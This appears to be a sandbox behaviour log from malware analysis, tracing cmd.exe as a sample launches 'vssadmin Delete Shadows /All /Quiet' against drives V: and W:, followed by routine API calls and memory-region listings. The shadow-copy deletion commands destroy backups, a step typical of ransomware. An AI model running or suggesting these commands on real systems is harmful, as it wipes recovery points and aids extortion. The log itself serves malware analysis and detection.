	[0239.356] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=W: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f3b8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=W: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f404 | out: lpCommandLine="vssadmin  Delete Shadows /For=W: /All /Quiet ", lpProcessInformation=0x18f404*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x650, dwThreadId=0x13e4)) returned 1
	[0239.375] CloseHandle (hObject=0xa4) returned 1
	[0239.375] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0239.375] GetProcessHeap () returned 0x46d0000
	[0239.375] RtlFreeHeap (HeapHandle=0x46d0000, Flags=0x0, BaseAddress=0x46dadf0) returned 1
	[0239.375] GetEnvironmentStringsW () returned 0x46da248*
	[0239.375] GetProcessHeap () returned 0x46d0000
	[0239.375] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0xb9c) returned 0x46dadf0
	[0239.375] memcpy (in: _Dst=0x46dadf0, _Src=0x46da248, _Size=0xb9c | out: _Dst=0x46dadf0) returned 0x46dadf0
	[0239.376] FreeEnvironmentStringsA (penv="=") returned 1
	[0239.376] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0258.876] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f39c | out: lpExitCode=0x18f39c*=0x2) returned 1
	[0258.877] CloseHandle (hObject=0xa8) returned 1
	[0258.878] _vsnwprintf (in: _Buffer=0x18f484, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f3a4 | out: _Buffer="00000002") returned 8
	[0258.879] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0258.880] GetProcessHeap () returned 0x46d0000
	[0258.880] RtlFreeHeap (HeapHandle=0x46d0000, Flags=0x0, BaseAddress=0x46dadf0) returned 1
	[0258.880] GetEnvironmentStringsW () returned 0x46da248*
	[0258.881] GetProcessHeap () returned 0x46d0000
	[0258.881] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0xbc2) returned 0x46dc568
	[0258.881] memcpy (in: _Dst=0x46dc568, _Src=0x46da248, _Size=0xbc2 | out: _Dst=0x46dc568) returned 0x46dc568
	[0258.881] FreeEnvironmentStringsA (penv="=") returned 1
	[0258.881] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0258.881] GetProcessHeap () returned 0x46d0000
	[0258.881] RtlFreeHeap (HeapHandle=0x46d0000, Flags=0x0, BaseAddress=0x46dc568) returned 1
	[0258.881] GetEnvironmentStringsW () returned 0x46da248*
	[0258.881] GetProcessHeap () returned 0x46d0000
	[0258.882] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0xbc2) returned 0x46dc568
	[0258.882] memcpy (in: _Dst=0x46dc568, _Src=0x46da248, _Size=0xbc2 | out: _Dst=0x46dc568) returned 0x46dc568
	[0258.882] FreeEnvironmentStringsA (penv="=") returned 1
	[0258.882] GetProcessHeap () returned 0x46d0000
	[0258.882] RtlFreeHeap (HeapHandle=0x46d0000, Flags=0x0, BaseAddress=0x46d7530) returned 1
	[0258.882] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f430 | out: lpAttributeList=0x18f430) 
	[0258.882] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0258.882] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0259.074] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0259.074] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0259.303] _get_osfhandle (_FileHandle=0) returned 0x38
	[0259.303] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0259.514] SetConsoleInputExeNameW () returned 0x1
	[0259.514] GetConsoleOutputCP () returned 0x1b5
	[0260.084] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0260.085] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0260.489] exit (_Code=2) 

Thread:
	id = 65
	os_tid = 0xf94


Process:
	id = "13"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x336e3000"
	os_pid = "0x1324"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=V: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 901
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 902
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 903
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 904
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 905
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 906
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 907
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 908
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 909
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 910
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 911
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 912
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 913
	        start_va = 0x7fc70000
	          end_va = 0x7fc92fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007fc70000"
	        filename = ""

Region:
	              id = 914
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 915
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 916
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 917
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 918
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 927
	        start_va = 0x1c0000
	          end_va = 0x28ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 928
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 929
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 944
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 951
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 952
	        start_va = 0x4600000
	          end_va = 0x481ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 953
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 972
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 973
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 974
	        start_va = 0x7fb70000
	          end_va = 0x7fc6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007fb70000"
	        filename = ""

Region:
	              id = 1358
	        start_va = 0x1c0000
	          end_va = 0x27dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1359
	        start_va = 0x280000
	          end_va = 0x28ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000280000"
	        filename = ""

Region:
	              id = 1360
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1361
	        start_va = 0x290000
	          end_va = 0x2cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000290000"
	        filename = ""

Region:
	              id = 1362
	        start_va = 0x4600000
	          end_va = 0x46fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 1363
	        start_va = 0x4720000
	          end_va = 0x481ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004720000"
	        filename = ""

Region:
	              id = 1364
	        start_va = 0x4820000
	          end_va = 0x495ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004820000"
	        filename = ""

Region:
	              id = 1365
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1609
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 1744
	        start_va = 0x4960000
	          end_va = 0x4c96fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 39
	os_tid = 0xe80

	[0238.404] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0238.405] GetProcessHeap () returned 0x4720000
	[0238.405] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0x400a) returned 0x472c400
	[0238.405] GetProcessHeap () returned 0x4720000
	[0238.406] RtlFreeHeap (HeapHandle=0x4720000, Flags=0x0, BaseAddress=0x472c400) returned 1
	[0238.408] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0238.408] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0238.408] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0238.408] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0238.408] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0238.408] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0238.408] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0238.408] GetProcessHeap () returned 0x4720000
	[0238.408] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0x58) returned 0x4729000
	[0238.408] GetProcessHeap () returned 0x4720000
	[0238.408] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0x1a) returned 0x4720578
	[0238.411] GetProcessHeap () returned 0x4720000
	[0238.411] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0x52) returned 0x4729060
	[0238.413] GetConsoleTitleW (in: lpConsoleTitle=0x18f5d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0238.873] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0238.874] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0238.875] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0238.876] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0238.877] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0238.878] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0238.879] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0238.879] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0238.880] GetProcessHeap () returned 0x4720000
	[0238.880] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0x210) returned 0x47290c0
	[0238.880] GetProcessHeap () returned 0x4720000
	[0238.880] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0x64) returned 0x47292d8
	[0238.880] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0238.881] GetProcessHeap () returned 0x4720000
	[0238.881] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0x418) returned 0x47205c8
	[0238.881] SetErrorMode (uMode=0x0) returned 0x0
	[0238.881] SetErrorMode (uMode=0x1) returned 0x0
	[0238.881] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47205d0, lpFilePart=0x18f0dc | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f0dc*="Desktop") returned 0x1d
	[0238.882] SetErrorMode (uMode=0x0) returned 0x1
	[0238.882] GetProcessHeap () returned 0x4720000
	[0238.882] RtlReAllocateHeap (Heap=0x4720000, Flags=0x0, Ptr=0x47205c8, Size=0x56) returned 0x47205c8
	[0238.882] GetProcessHeap () returned 0x4720000
	[0238.882] RtlSizeHeap (HeapHandle=0x4720000, Flags=0x0, MemoryPointer=0x47205c8) returned 0x56
	[0238.883] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0238.883] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0238.884] GetProcessHeap () returned 0x4720000
	[0238.884] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0x182) returned 0x4729348
	[0238.884] GetProcessHeap () returned 0x4720000
	[0238.884] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0x2fc) returned 0x4720628
	[0238.910] GetProcessHeap () returned 0x4720000
	[0238.910] RtlReAllocateHeap (Heap=0x4720000, Flags=0x0, Ptr=0x4720628, Size=0x184) returned 0x4720628
	[0238.910] GetProcessHeap () returned 0x4720000
	[0238.911] RtlSizeHeap (HeapHandle=0x4720000, Flags=0x0, MemoryPointer=0x4720628) returned 0x184
	[0238.911] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0238.911] GetProcessHeap () returned 0x4720000
	[0238.911] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x8, Size=0xe0) returned 0x47294d8
	[0239.339] GetProcessHeap () returned 0x4720000
	[0239.339] RtlReAllocateHeap (Heap=0x4720000, Flags=0x0, Ptr=0x47294d8, Size=0x76) returned 0x47294d8
	[0239.339] GetProcessHeap () returned 0x4720000
	[0239.340] RtlSizeHeap (HeapHandle=0x4720000, Flags=0x0, MemoryPointer=0x47294d8) returned 0x76
	[0239.341] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0239.342] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee68) returned 0xffffffff
	[0239.343] GetLastError () returned 0x2
	[0239.343] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0239.343] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee68) returned 0xffffffff
	[0239.343] GetLastError () returned 0x2
	[0239.344] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0239.344] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee68) returned 0x4729558
	[0239.344] GetProcessHeap () returned 0x4720000
	[0239.344] RtlAllocateHeap (HeapHandle=0x4720000, Flags=0x0, Size=0x14) returned 0x4727738
	[0239.344] FindClose (in: hFindFile=0x4729558 | out: hFindFile=0x4729558) returned 1
	[0239.345] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18ee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee68) returned 0xffffffff
	[0239.345] GetLastError () returned 0x2
	[0239.345] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18ee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee68) returned 0x4729558
	[0239.345] GetProcessHeap () returned 0x4720000
	[0239.345] RtlReAllocateHeap (Heap=0x4720000, Flags=0x0, Ptr=0x4727738, Size=0x4) returned 0x4729598
	[0239.345] FindClose (in: hFindFile=0x4729558 | out: hFindFile=0x4729558) returned 1
	[0239.346] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0239.346] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0239.346] GetConsoleTitleW (in: lpConsoleTitle=0x18f35c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0240.287] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f288, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f26c | out: lpAttributeList=0x18f288, lpSize=0x18f26c) returned 1
	[0240.287] UpdateProcThreadAttribute (in: lpAttributeList=0x18f288, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f274, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f288, lpPreviousValue=0x0) returned 1
	[0240.287] GetStartupInfoW (in: lpStartupInfo=0x18f2c0 | out: lpStartupInfo=0x18f2c0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0240.288] GetProcessHeap () returned 0x4720000
